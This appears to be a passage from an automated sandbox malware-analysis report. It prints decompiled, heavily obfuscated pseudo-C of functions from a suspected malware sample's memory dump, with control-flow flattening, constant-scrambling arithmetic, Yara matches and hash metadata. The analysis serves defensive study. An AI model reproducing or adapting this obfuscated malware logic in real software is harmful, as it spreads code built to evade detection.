				_t16 =  &_v1152; // 0x705433
				_v1152 =  *_t16 * 0x2c;
				_v1152 = _v1152 << 0xa;
				_t361 = 0x6c;
				_v1152 = _v1152 / _t361;
				_v1152 = _v1152 ^ 0x008cb6ab;
				_v1056 = 0xd48a8d;
				_t362 = 0x3d;
				_v1056 = _v1056 * 0x52;
				_v1056 = _v1056 ^ 0x44188b10;
				_v1148 = 0xe8a1a4;
				_v1148 = _v1148 + 0xffff8445;
				_v1148 = _v1148 | 0x150de577;
				_v1148 = _v1148 ^ 0x15ecbdc8;
				_v1124 = 0x50c1ed;
				_v1124 = _v1124 | 0x9ced1bc9;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 | 0xa10f3434;
				_v1124 = _v1124 ^ 0xa10cf900;
				_v1132 = 0xd65ea8;
				_v1132 = _v1132 / _t362;
				_v1132 = _v1132 << 0xc;
				_v1132 = _v1132 + 0xffffd745;
				_v1132 = _v1132 ^ 0x383476ea;
				_v1092 = 0x7d248b;
				_v1092 = _v1092 + 0x3adc;
				_v1092 = _v1092 | 0x1757e69d;
				_v1092 = _v1092 ^ 0x177f08c2;
				_v1100 = 0x68c52b;
				_v1100 = _v1100 << 0xd;
				_v1100 = _v1100 + 0xffff6c94;
				_v1100 = _v1100 ^ 0x18a2cc44;
				_v1108 = 0xf64a56;
				_v1108 = _v1108 >> 4;
				_v1108 = _v1108 * 0x7f;
				_v1108 = _v1108 ^ 0x07a4a319;
				_v1116 = 0xd81790;
				_v1116 = _v1116 * 0x43;
				_v1116 = _v1116 * 0x58;
				_v1116 = _v1116 ^ 0x70d3674e;
				_v1084 = 0xe6426f;
				_v1084 = _v1084 << 0xe;
				_v1084 = _v1084 | 0xd1d471be;
				_v1084 = _v1084 ^ 0xd1dea415;
				_v1076 = 0x8c6f58;
				_v1076 = _v1076 | 0x991e36bf;
				_v1076 = _v1076 ^ 0x99977486;
				_v1160 = 0x236549;
				_v1160 = _v1160 ^ 0x427975cb;
				_v1160 = _v1160 + 0x3095;
				_v1160 = _v1160 >> 4;
				_v1160 = _v1160 ^ 0x042dc73f;
				_v1164 = 0xfebce3;
				_v1164 = _v1164 >> 0xf;
				_v1164 = _v1164 >> 7;
				_t363 = 0x1e;
				_v1164 = _v1164 / _t363;
				_v1164 = _v1164 ^ 0x000c9c1e;
				_v1080 = 0x5349f6;
				_v1080 = _v1080 << 0xf;
				_v1080 = _v1080 ^ 0xa4f9f85e;
				_v1140 = 0x26cb2a;
				_t364 = 0x15;
				_v1140 = _v1140 * 0x24;
				_v1140 = _v1140 | 0x0de1b006;
				_v1140 = _v1140 ^ 0xe7339f4d;
				_v1140 = _v1140 ^ 0xeac16655;
				_v1112 = 0x9852f8;
				_v1112 = _v1112 + 0x72cd;
				_v1112 = _v1112 * 0x14;
				_v1112 = _v1112 ^ 0x0bea8297;
				_v1072 = 0xdc0abc;
				_v1072 = _v1072 ^ 0x7308e6d0;
				_v1072 = _v1072 ^ 0x73d1aa5a;
				_v1088 = 0x8fedd;
				_v1088 = _v1088 ^ 0x69cb2d45;
				_v1088 = _v1088 << 1;
				_v1088 = _v1088 ^ 0xd38c1690;
				_v1104 = 0xaf7f4d;
				_v1104 = _v1104 ^ 0x9cac2162;
				_v1104 = _v1104 / _t364;
				_v1104 = _v1104 ^ 0x076c0045;
				_v1044 = 0x538525;
				_v1044 = _v1044 << 9;
				_v1044 = _v1044 ^ 0xa7034723;
				_v1096 = 0xea9b15;
				_t365 = 0x4b;
				_v1096 = _v1096 * 0x60;
				_v1096 = _v1096 ^ 0x235e7f1a;
				_v1096 = _v1096 ^ 0x74af7ddb;
				_v1064 = 0xdeb775;
				_v1064 = _v1064 >> 0xf;
				_v1064 = _v1064 ^ 0x0008978c;
				_v1156 = 0x6783c9;
				_v1156 = _v1156 * 0x36;
				_v1156 = _v1156 >> 0xf;
				_v1156 = _v1156 >> 1;
				_v1156 = _v1156 ^ 0x0003dd71;
				_v1060 = 0xb82108;
				_v1060 = _v1060 >> 9;
				_v1060 = _v1060 ^ 0x0000ce5f;
				_v1068 = 0x376109;
				_v1068 = _v1068 + 0xffffb593;
				_v1068 = _v1068 ^ 0x00346b58;
				_v1136 = 0xb96fb1;
				_v1136 = _v1136 << 0x10;
				_v1136 = _v1136 / _t365;
				_v1136 = _v1136 | 0x4a356d96;
				_v1136 = _v1136 ^ 0x4b71a912;
				_v1120 = 0x2830ef;
				_t220 =  &_v1120; // 0x2830ef
				_t366 = 0x43;
				_v1120 =  *_t220 * 0x5a;
				_v1120 = _v1120 >> 0xc;
				_v1120 = _v1120 / _t366;
				_v1120 = _v1120 ^ 0x000d571a;
				_v1052 = 0xc9677a;
				_v1052 = _v1052 << 0xd;
				_v1052 = _v1052 ^ 0x2ceb6ba4;
				_v1128 = 0x31f152;
				_v1128 = _v1128 + 0xae1c;
				_v1128 = _v1128 + 0xffff0313;
				_v1128 = _v1128 + 0xffff1566;
				_v1128 = _v1128 ^ 0x003472f6;
				do {
					while(_t329 != 0x186cafe) {
						if(_t329 == 0x4a9d402) {
							E001C7795();
							L9:
							_t329 = 0xa86fb5e;
							continue;
						}
						if(_t329 == 0xa86fb5e) {
							_push(_v1124);
							_push(_v1148);
							_t313 = E001DCD35(0x1c1000, _v1056, __eflags);
							_pop(_t332);
							E001D2EA5( *0x1e5218 + 0x234, __eflags,  *0x1e5218 + 0x18, _t332, _v1092, _v1100, _t313, _v1108, _v1116,  &_v520);
							E001D629F(_v1084, _t313, _v1076, _v1160, _v1164);
							_t369 =  &(_t369[0xb]);
							_t329 = 0xdf279c5;
							continue;
						}
						if(_t329 == 0xad35f7f) {
							_t319 = E001D52D1();
							goto L9;
						}
						if(_t329 == 0xc062218) {
							_t321 = E001C2B69(_v1060, _v1068,  &_v520, _v1136);
							__eflags = 0;
							 *_t321 = 0;
							return E001C4025(_v1120,  &_v520, _v1052, _v1128);
						}
						_t378 = _t329 - 0xdf279c5;
						if(_t329 != 0xdf279c5) {
							goto L15;
						}
						E001DD5C5(_t329, _v1080,  &_v1040, _v1140, _v1112, _v1072);
						E001C39C5(_t329, _v1088, _v1104,  &_v1040, _v1044, _v1096,  &_v1040);
						_push(_v1156);
						_push( &_v520);
						_t319 = E001D9124(_v1064,  &_v1040, _t378);
						_t369 =  &(_t369[0xb]);
						_t329 = 0xc062218;
					}
					__eflags =  *((intOrPtr*)( *0x1e5218 + 0x43c));
					if(__eflags == 0) {
						_t329 = 0x4a9d402;
						goto L15;
					}
					_t329 = 0xad35f7f;
					continue;
					L15:
					__eflags = _t329 - 0x4ea2fc0;
				} while (__eflags != 0);
				return _t319;
			}
















































                          0x001d3043
                          0x001d3049
                          0x001d3053
                          0x001d305b
                          0x001d3060
                          0x001d3068
                          0x001d3070
                          0x001d3075
                          0x001d307a
                          0x001d307f
                          0x001d3087
                          0x001d308f
                          0x001d3098
                          0x001d309c
                          0x001d30a7
                          0x001d30ac
                          0x001d30b2
                          0x001d30ba
                          0x001d30cd
                          0x001d30ce
                          0x001d30d2
                          0x001d30da
                          0x001d30ea
                          0x001d30f2
                          0x001d30fa
                          0x001d3102
                          0x001d310a
                          0x001d3112
                          0x001d3117
                          0x001d311f
                          0x001d3127
                          0x001d3135
                          0x001d3139
                          0x001d313e
                          0x001d3146
                          0x001d314e
                          0x001d3156
                          0x001d315e
                          0x001d3166
                          0x001d316e
                          0x001d3176
                          0x001d317b
                          0x001d3183
                          0x001d318b
                          0x001d3193
                          0x001d319d
                          0x001d31a1
                          0x001d31a9
                          0x001d31b6
                          0x001d31bf
                          0x001d31c3
                          0x001d31cb
                          0x001d31d3
                          0x001d31d8
                          0x001d31e0
                          0x001d31e8
                          0x001d31f0
                          0x001d31f8
                          0x001d3200
                          0x001d3208
                          0x001d3210
                          0x001d3218
                          0x001d321d
                          0x001d3225
                          0x001d322d
                          0x001d3234
                          0x001d323f
                          0x001d3244
                          0x001d324a
                          0x001d3252
                          0x001d325a
                          0x001d325f
                          0x001d3267
                          0x001d3274
                          0x001d3277
                          0x001d327b
                          0x001d3283
                          0x001d328b
                          0x001d3293
                          0x001d329b
                          0x001d32a8
                          0x001d32ac
                          0x001d32b4
                          0x001d32bc
                          0x001d32c4
                          0x001d32cc
                          0x001d32d4
                          0x001d32dc
                          0x001d32e0
                          0x001d32e8
                          0x001d32f0
                          0x001d3300
                          0x001d3304
                          0x001d330c
                          0x001d3317
                          0x001d331f
                          0x001d332a
                          0x001d3337
                          0x001d333a
                          0x001d333e
                          0x001d3346
                          0x001d334e
                          0x001d3356
                          0x001d335b
                          0x001d3363
                          0x001d3370
                          0x001d3374
                          0x001d3379
                          0x001d337d
                          0x001d3385
                          0x001d338d
                          0x001d3392
                          0x001d339a
                          0x001d33a2
                          0x001d33aa
                          0x001d33b2
                          0x001d33ba
                          0x001d33c7
                          0x001d33cb
                          0x001d33d3
                          0x001d33db
                          0x001d33e3
                          0x001d33e8
                          0x001d33e9
                          0x001d33ed
                          0x001d33f8
                          0x001d3401
                          0x001d340e
                          0x001d341e
                          0x001d3426
                          0x001d3431
                          0x001d3439
                          0x001d3441
                          0x001d3449
                          0x001d3451
                          0x001d3459
                          0x001d3459
                          0x001d3467
                          0x001d3597
                          0x001d350e
                          0x001d350e
                          0x00000000
                          0x001d350e
                          0x001d346f
                          0x001d3515
                          0x001d351e
                          0x001d3529
                          0x001d352f
                          0x001d3560
                          0x001d357d
                          0x001d3582
                          0x001d3585
                          0x00000000
                          0x001d3585
                          0x001d3477
                          0x001d3509
                          0x00000000
                          0x001d3509
                          0x001d3483
                          0x001d35da
                          0x001d35e3
                          0x001d35f3
                          0x00000000
                          0x001d35ff
                          0x001d3489
                          0x001d348f
                          0x00000000
                          0x00000000
                          0x001d34ad
                          0x001d34d1
                          0x001d34d6
                          0x001d34e8
                          0x001d34f0
                          0x001d34f5
                          0x001d34f8
                          0x001d34f8
                          0x001d35a6
                          0x001d35ad
                          0x001d35b6
                          0x00000000
                          0x001d35b6
                          0x001d35af
                          0x00000000
                          0x001d35b8
                          0x001d35b8
                          0x001d35b8
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 3Tp$E$Ie#$Xk4$oB$0($v48
                          • API String ID: 0-724312824
                          • Opcode ID: 35b1ce8b8dd61f73d6530b5aa8bf8dd483ce48af51045f2da2e7a7779a8bd755
                          • Instruction ID: b0f47de6a7c1abf8ba0e8480d8d9a7908e1cecc7b83a4d1df0af1b4897fdc225
                          • Opcode Fuzzy Hash: 35b1ce8b8dd61f73d6530b5aa8bf8dd483ce48af51045f2da2e7a7779a8bd755
                          • Instruction Fuzzy Hash: CCE111711083809FD369CF65D48AA5BFBE1FBC4348F108A1DF2A686260D7B19A49CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001D10CD, Relevance: 9.0, Strings: 7, Instructions: 246COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E001D10CD() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _t240;
				void* _t241;
				intOrPtr _t250;
				signed int _t253;
				void* _t256;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				void* _t286;
				signed int* _t288;
				void* _t291;

				_t288 =  &_v624;
				_v532 = 0xe57b87;
				_v532 = _v532 ^ 0x25168ae1;
				_t256 = 0x2f2f5f6;
				_v532 = _v532 ^ 0x25f3f17a;
				_v612 = 0xfe0f84;
				_t280 = 0x19;
				_v612 = _v612 / _t280;
				_v612 = _v612 + 0x2302;
				_t286 = 0;
				_v612 = _v612 + 0x80ef;
				_v612 = _v612 ^ 0x000acdac;
				_v580 = 0xda4e11;
				_v580 = _v580 + 0xffff50bf;
				_v580 = _v580 << 0xd;
				_v580 = _v580 ^ 0x33d5003f;
				_v572 = 0xe96466;
				_v572 = _v572 + 0xffff71ae;
				_v572 = _v572 + 0x4e4e;
				_v572 = _v572 ^ 0x00e0c677;
				_v588 = 0xa4980a;
				_t281 = 0x5d;
				_v588 = _v588 / _t281;
				_v588 = _v588 << 0xa;
				_v588 = _v588 ^ 0x0711cab5;
				_v556 = 0x65f7a4;
				_v556 = _v556 << 6;
				_v556 = _v556 ^ 0x1979ac6e;
				_v528 = 0x6debbf;
				_t282 = 0x56;
				_v528 = _v528 * 0x34;
				_v528 = _v528 ^ 0x16541216;
				_v564 = 0x4186bf;
				_v564 = _v564 >> 0xb;
				_v564 = _v564 ^ 0x0008323b;
				_v616 = 0x3750aa;
				_v616 = _v616 + 0xffffbcbe;
				_v616 = _v616 + 0xffff835a;
				_v616 = _v616 | 0x3cbb8257;
				_v616 = _v616 ^ 0x3cb4f187;
				_v624 = 0x17f460;
				_v624 = _v624 + 0xffffb19b;
				_v624 = _v624 ^ 0x2080664e;
				_v624 = _v624 + 0xffff6d42;
				_v624 = _v624 ^ 0x209d403f;
				_v576 = 0x1158bb;
				_v576 = _v576 + 0xee37;
				_v576 = _v576 * 0x58;
				_v576 = _v576 ^ 0x064c7012;
				_v604 = 0x2baa3d;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x98e766b9;
				_v604 = _v604 + 0x4c48;
				_v604 = _v604 ^ 0x98e41f98;
				_v620 = 0x6fa6d6;
				_v620 = _v620 >> 5;
				_v620 = _v620 / _t282;
				_v620 = _v620 | 0xc886e261;
				_v620 = _v620 ^ 0xc88dbbb8;
				_v548 = 0xe0fc73;
				_v548 = _v548 ^ 0x2ac40ca3;
				_v548 = _v548 ^ 0x2a287985;
				_v584 = 0xee5cba;
				_v584 = _v584 + 0xffffcff7;
				_v584 = _v584 + 0x6b95;
				_v584 = _v584 ^ 0x00e7dbe3;
				_v608 = 0x5f419;
				_v608 = _v608 >> 5;
				_t283 = 0x78;
				_v608 = _v608 * 0x3c;
				_v608 = _v608 ^ 0x09e1dc53;
				_v608 = _v608 ^ 0x09eb01c0;
				_v592 = 0x96a372;
				_v592 = _v592 >> 9;
				_v592 = _v592 ^ 0x6810639e;
				_v592 = _v592 ^ 0x681d828a;
				_v560 = 0x258dfe;
				_v560 = _v560 + 0xfffffbd8;
				_v560 = _v560 ^ 0x002ff2dd;
				_v600 = 0x31486b;
				_v600 = _v600 >> 3;
				_v600 = _v600 + 0xaca7;
				_v600 = _v600 ^ 0x3dc26e9c;
				_v600 = _v600 ^ 0x3dc4b11b;
				_v596 = 0x8b5ce6;
				_v596 = _v596 / _t283;
				_v596 = _v596 | 0xf2a89978;
				_v596 = _v596 ^ 0xf2adb690;
				_v540 = 0x143903;
				_v540 = _v540 >> 0xd;
				_v540 = _v540 ^ 0x000236aa;
				_v536 = 0x86688b;
				_t284 = 0x22;
				_v536 = _v536 * 0x2c;
				_v536 = _v536 ^ 0x171ea9c6;
				_v544 = 0xdb9b0;
				_v544 = _v544 | 0xe72e2065;
				_v544 = _v544 ^ 0xe727c8fd;
				_v568 = 0x9bfe95;
				_v568 = _v568 | 0x6ff05444;
				_t285 = _v524;
				_v568 = _v568 / _t284;
				_v568 = _v568 ^ 0x03415ea7;
				_v552 = 0x5d2fe7;
				_v552 = _v552 << 0x10;
				_v552 = _v552 ^ 0x2fe7e899;
				goto L1;
				do {
					while(1) {
						L1:
						_t291 = _t256 - 0x9d45361;
						if(_t291 > 0) {
							break;
						}
						if(_t291 == 0) {
							E001D855C( &_v520, _v560, __eflags, _v600, _v596, _t256, _v540);
							 *((intOrPtr*)( *0x1e5218 + 0x448)) = E001DBD02(_v536, _v544, _v568, _v552);
							L22:
							return _t286;
						}
						if(_t256 == 0xb87700) {
							_t256 = 0x3925c38;
							_v524 = _v612;
							continue;
						}
						if(_t256 == 0x2f2f5f6) {
							_push(_t256);
							_push(_t256);
							_t250 = E001D5212(0x450);
							_t288 =  &(_t288[3]);
							 *0x1e5218 = _t250;
							_t256 = 0xedae1a9;
							continue;
						}
						if(_t256 == 0x3925c38) {
							E001CEDC5(_v576, _t285, _v604, _v620);
							_t256 = 0xddbf72d;
							continue;
						}
						if(_t256 != 0x85025e3) {
							goto L19;
						}
						E001C8D80();
						_t256 = 0x9d45361;
					}
					__eflags = _t256 - 0xc174429;
					if(_t256 == 0xc174429) {
						_t256 = 0xddbf72d;
						_v524 = _v532;
						goto L19;
					}
					__eflags = _t256 - 0xddbf72d;
					if(_t256 == 0xddbf72d) {
						_t240 = E001CB3B4(_v548, _t256, _v584, _t256, _v608,  *0x1e5218 + 0x18, _v592, _v524);
						_t288 =  &(_t288[7]);
						_t256 = 0x85025e3;
						__eflags = _t240;
						_t241 = 1;
						_t286 =  ==  ? _t241 : _t286;
						goto L1;
					}
					__eflags = _t256 - 0xedae1a9;
					if(_t256 != 0xedae1a9) {
						goto L19;
					}
					_t253 = E001CACDB(_t256, _v564, _v616, _v580, _t256, _v624);
					_t285 = _t253;
					_t288 =  &(_t288[4]);
					__eflags = _t253;
					if(__eflags == 0) {
						_t256 = 0xc174429;
					} else {
						 *((intOrPtr*)( *0x1e5218 + 0x43c)) = 1;
						_t256 = 0xb87700;
					}
					goto L1;
					L19:
					__eflags = _t256 - 0x18ee40e;
				} while (__eflags != 0);
				goto L22;
			}











































                          0x001d10cd
                          0x001d10d3
                          0x001d10dd
                          0x001d10e5
                          0x001d10ea
                          0x001d10f2
                          0x001d1104
                          0x001d1109
                          0x001d110f
                          0x001d1117
                          0x001d1119
                          0x001d1121
                          0x001d1129
                          0x001d1131
                          0x001d1139
                          0x001d113e
                          0x001d1146
                          0x001d114e
                          0x001d1156
                          0x001d115e
                          0x001d1166
                          0x001d1172
                          0x001d1177
                          0x001d117d
                          0x001d1182
                          0x001d118a
                          0x001d1192
                          0x001d1197
                          0x001d119f
                          0x001d11ac
                          0x001d11ad
                          0x001d11b1
                          0x001d11b9
                          0x001d11c1
                          0x001d11c6
                          0x001d11ce
                          0x001d11d6
                          0x001d11de
                          0x001d11e6
                          0x001d11ee
                          0x001d11f6
                          0x001d11fe
                          0x001d1206
                          0x001d120e
                          0x001d1216
                          0x001d121e
                          0x001d1226
                          0x001d1233
                          0x001d1237
                          0x001d123f
                          0x001d1247
                          0x001d124c
                          0x001d1254
                          0x001d125c
                          0x001d1264
                          0x001d126c
                          0x001d1277
                          0x001d127b
                          0x001d1283
                          0x001d128b
                          0x001d1293
                          0x001d129b
                          0x001d12a3
                          0x001d12ab
                          0x001d12b3
                          0x001d12bd
                          0x001d12ca
                          0x001d12d7
                          0x001d12e3
                          0x001d12e6
                          0x001d12ea
                          0x001d12f2
                          0x001d12fa
                          0x001d1302
                          0x001d1307
                          0x001d130f
                          0x001d1317
                          0x001d131f
                          0x001d1327
                          0x001d132f
                          0x001d1337
                          0x001d133c
                          0x001d1344
                          0x001d134c
                          0x001d1354
                          0x001d1364
                          0x001d1368
                          0x001d1370
                          0x001d1378
                          0x001d1380
                          0x001d1385
                          0x001d138d
                          0x001d139a
                          0x001d139b
                          0x001d139f
                          0x001d13a7
                          0x001d13af
                          0x001d13b7
                          0x001d13bf
                          0x001d13c7
                          0x001d13d5
                          0x001d13d9
                          0x001d13dd
                          0x001d13e5
                          0x001d13ed
                          0x001d13f2
                          0x001d13f2
                          0x001d13fa
                          0x001d13fa
                          0x001d13fa
                          0x001d13fa
                          0x001d13fc
                          0x00000000
                          0x00000000
                          0x001d1402
                          0x001d1551
                          0x001d157e
                          0x001d1585
                          0x001d1590
                          0x001d1590
                          0x001d140e
                          0x001d147d
                          0x001d1482
                          0x00000000
                          0x001d1482
                          0x001d1416
                          0x001d145e
                          0x001d145f
                          0x001d1465
                          0x001d146a
                          0x001d146d
                          0x001d1472
                          0x00000000
                          0x001d1472
                          0x001d141e
                          0x001d1443
                          0x001d144a
                          0x00000000
                          0x001d144a
                          0x001d1426
                          0x00000000
                          0x00000000
                          0x001d142c
                          0x001d1431
                          0x001d1431
                          0x001d148b
                          0x001d1491
                          0x001d1525
                          0x001d1527
                          0x00000000
                          0x001d1527
                          0x001d1497
                          0x001d1499
                          0x001d1507
                          0x001d150c
                          0x001d150f
                          0x001d1514
                          0x001d1518
                          0x001d1519
                          0x00000000
                          0x001d1519
                          0x001d149b
                          0x001d14a1
                          0x00000000
                          0x00000000
                          0x001d14b8
                          0x001d14bd
                          0x001d14bf
                          0x001d14c2
                          0x001d14c4
                          0x001d14de
                          0x001d14c6
                          0x001d14ce
                          0x001d14d4
                          0x001d14d4
                          0x00000000
                          0x001d152b
                          0x001d152b
                          0x001d152b
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7$HL$NN$e .$fd$kH1$/]
                          • API String ID: 0-3661360838
                          • Opcode ID: 102c29244b858a0502a038120fc75e3dd5f026cd3965a2b1480ca28c7c2f80a8
                          • Instruction ID: 10e653ff30c32328e3f24412ad2fadc9658434c12596b968fd3c440f5404bce0
                          • Opcode Fuzzy Hash: 102c29244b858a0502a038120fc75e3dd5f026cd3965a2b1480ca28c7c2f80a8
                          • Instruction Fuzzy Hash: 54C13271108381ABC368CF69D98A41FBBF1FBD4758F604A1EF29296260C7B58949CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 001CF73B, Relevance: 8.9, Strings: 7, Instructions: 181COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 90%
                          			E001CF73B(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				intOrPtr _v564;
				char _v592;
				signed int _v596;
				intOrPtr _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				void* __ecx;
				void* _t148;
				void* _t159;
				signed int _t162;
				signed int _t163;
				void* _t171;
				signed int _t175;
				intOrPtr _t191;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				signed int* _t198;

				_t191 = _a16;
				_push(_t191);
				_push(_a12);
				_push(_a8);
				_push(E001D27C2);
				_push(__edx);
				E001C358A(_t148);
				_v596 = _v596 & 0x00000000;
				_t198 =  &(( &_v660)[6]);
				_v600 = 0x402688;
				_v604 = 0x25492e;
				_t171 = 0xdac63a8;
				_v604 = _v604 | 0xaef4ed6a;
				_v604 = _v604 ^ 0xaef5ed6c;
				_v652 = 0x2838e9;
				_v652 = _v652 >> 0xa;
				_v652 = _v652 << 3;
				_v652 = _v652 | 0x614731bf;
				_v652 = _v652 ^ 0x614bd185;
				_v624 = 0xf4693d;
				_v624 = _v624 << 0xb;
				_v624 = _v624 << 2;
				_v624 = _v624 ^ 0x8d2695b4;
				_v632 = 0x9094e4;
				_v632 = _v632 >> 4;
				_t192 = 0x68;
				_v632 = _v632 * 0x24;
				_v632 = _v632 ^ 0x014e1cf6;
				_v644 = 0xe7f27d;
				_v644 = _v644 + 0xffffaae4;
				_v644 = _v644 + 0x4248;
				_v644 = _v644 * 0x59;
				_v644 = _v644 ^ 0x50912620;
				_v616 = 0xe211d0;
				_v616 = _v616 / _t192;
				_v616 = _v616 ^ 0x000f0337;
				_v612 = 0x41d4d;
				_t193 = 0x6d;
				_v612 = _v612 / _t193;
				_v612 = _v612 ^ 0x000a96e0;
				_v660 = 0x59117e;
				_v660 = _v660 + 0xffff20e1;
				_v660 = _v660 >> 4;
				_v660 = _v660 + 0x7439;
				_v660 = _v660 ^ 0x0009be27;
				_v636 = 0x1369d9;
				_v636 = _v636 + 0xffffda73;
				_v636 = _v636 + 0xffff9758;
				_v636 = _v636 ^ 0x001025fd;
				_v648 = 0x727c60;
				_v648 = _v648 << 0xe;
				_v648 = _v648 ^ 0xf402b4e8;
				_v648 = _v648 >> 0xb;
				_v648 = _v648 ^ 0x0009ed3b;
				_v656 = 0xc32e83;
				_v656 = _v656 << 0xf;
				_v656 = _v656 << 0xe;
				_t194 = 0x67;
				_v656 = _v656 / _t194;
				_v656 = _v656 ^ 0x00e2da39;
				_v608 = 0x407dcf;
				_v608 = _v608 | 0x4e58c956;
				_v608 = _v608 ^ 0x4e53cb3d;
				_v628 = 0xdc0dfd;
				_v628 = _v628 << 2;
				_v628 = _v628 * 0x29;
				_v628 = _v628 ^ 0x8cfb8f03;
				_v640 = 0x2bb14e;
				_v640 = _v640 << 9;
				_v640 = _v640 << 0xb;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x053e2e8e;
				_v620 = 0x85f6b7;
				_v620 = _v620 >> 9;
				_v620 = _v620 ^ 0x0003e478;
				_t195 = _v620;
				do {
					while(_t171 != 0x36aba09) {
						if(_t171 == 0x38eb3fe) {
							_t162 = E001D27C2(_t171,  &_v556,  &_v592);
							asm("sbb ecx, ecx");
							_t175 =  ~_t162 & 0xf8b5f69f;
							L11:
							_t171 = _t175 + 0xab4c36a;
							continue;
						}
						if(_t171 == 0x94e386a) {
							_v556 = 0x22c;
							_t163 = E001CCA5D(_v616,  &_v556, _t195, _v612, _v660, _v636);
							_t198 =  &(_t198[4]);
							asm("sbb ecx, ecx");
							_t175 =  ~_t163 & 0xf8d9f094;
							goto L11;
						}
						if(_t171 == 0xab4c36a) {
							return E001D4A33(_v640, _v620, _t195);
						}
						if(_t171 != 0xd5d9899) {
							if(_t171 != 0xdac63a8) {
								goto L16;
							} else {
								_v564 = _t191;
								_t171 = 0xd5d9899;
								continue;
							}
							L19:
							return _t163;
						}
						_push(_t171);
						_push(_t171);
						_t163 = E001E1B99(_t171, _t171, _v604);
						_t195 = _t163;
						_t198 =  &(_t198[4]);
						if(_t163 != 0xffffffff) {
							_t171 = 0x94e386a;
							continue;
						}
						goto L19;
					}
					_t159 = E001D95C7(_v648,  &_v556, _t195, _v656, _v608, _v628);
					_t198 =  &(_t198[4]);
					if(_t159 == 0) {
						_t171 = 0xab4c36a;
						goto L16;
					} else {
						_t171 = 0x38eb3fe;
						continue;
					}
					goto L19;
					L16:
				} while (_t171 != 0x1f9516d);
				return _t163;
			}



































                          0x001cf745
                          0x001cf74c
                          0x001cf74d
                          0x001cf754
                          0x001cf75b
                          0x001cf760
                          0x001cf762
                          0x001cf767
                          0x001cf76c
                          0x001cf76f
                          0x001cf779
                          0x001cf781
                          0x001cf786
                          0x001cf78e
                          0x001cf796
                          0x001cf79e
                          0x001cf7a3
                          0x001cf7a8
                          0x001cf7b0
                          0x001cf7b8
                          0x001cf7c0
                          0x001cf7c5
                          0x001cf7ca
                          0x001cf7d2
                          0x001cf7da
                          0x001cf7e6
                          0x001cf7e9
                          0x001cf7ed
                          0x001cf7f5
                          0x001cf7fd
                          0x001cf805
                          0x001cf812
                          0x001cf816
                          0x001cf81e
                          0x001cf82e
                          0x001cf832
                          0x001cf83a
                          0x001cf846
                          0x001cf84b
                          0x001cf851
                          0x001cf859
                          0x001cf861
                          0x001cf869
                          0x001cf86e
                          0x001cf876
                          0x001cf87e
                          0x001cf886
                          0x001cf88e
                          0x001cf896
                          0x001cf89e
                          0x001cf8a6
                          0x001cf8ab
                          0x001cf8b3
                          0x001cf8b8
                          0x001cf8c0
                          0x001cf8c8
                          0x001cf8cd
                          0x001cf8d6
                          0x001cf8d9
                          0x001cf8dd
                          0x001cf8e5
                          0x001cf8ed
                          0x001cf8f5
                          0x001cf902
                          0x001cf90f
                          0x001cf919
                          0x001cf91d
                          0x001cf925
                          0x001cf92d
                          0x001cf932
                          0x001cf937
                          0x001cf93c
                          0x001cf944
                          0x001cf94c
                          0x001cf951
                          0x001cf959
                          0x001cf95d
                          0x001cf95d
                          0x001cf96b
                          0x001cfa13
                          0x001cfa1c
                          0x001cfa1e
                          0x001cfa02
                          0x001cfa02
                          0x00000000
                          0x001cfa02
                          0x001cf977
                          0x001cf9d9
                          0x001cf9ee
                          0x001cf9f3
                          0x001cf9fa
                          0x001cf9fc
                          0x00000000
                          0x001cf9fc
                          0x001cf97b
                          0x00000000
                          0x001cfa6c
                          0x001cf987
                          0x001cf98f
                          0x00000000
                          0x001cf995
                          0x001cf995
                          0x001cf999
                          0x00000000
                          0x001cf999
                          0x001cfa77
                          0x001cfa77
                          0x001cfa77
                          0x001cf9b0
                          0x001cf9b1
                          0x001cf9b7
                          0x001cf9bc
                          0x001cf9be
                          0x001cf9c4
                          0x001cf9ca
                          0x00000000
                          0x001cf9ca
                          0x00000000
                          0x001cf9c4
                          0x001cfa3b
                          0x001cfa40
                          0x001cfa45
                          0x001cfa4e
                          0x00000000
                          0x001cfa47
                          0x001cfa47
                          0x00000000
                          0x001cfa47
                          0x00000000
                          0x001cfa50
                          0x001cfa50
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993327606.00000000001C0000.00000040.00000010.sdmp, Offset: 001C0000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .I%$9t$;$HB$j8N$j8N$8(
                          • API String ID: 0-1563950138
                          • Opcode ID: 0b82ea4b7c4b71e1f41083769939d5d5253734d5f9755802e78838f6eefac090
                          • Instruction ID: 3356a30193ba833d0e0aa4bc0e68c9bf64eb30410a926783cebeee463c6043dc
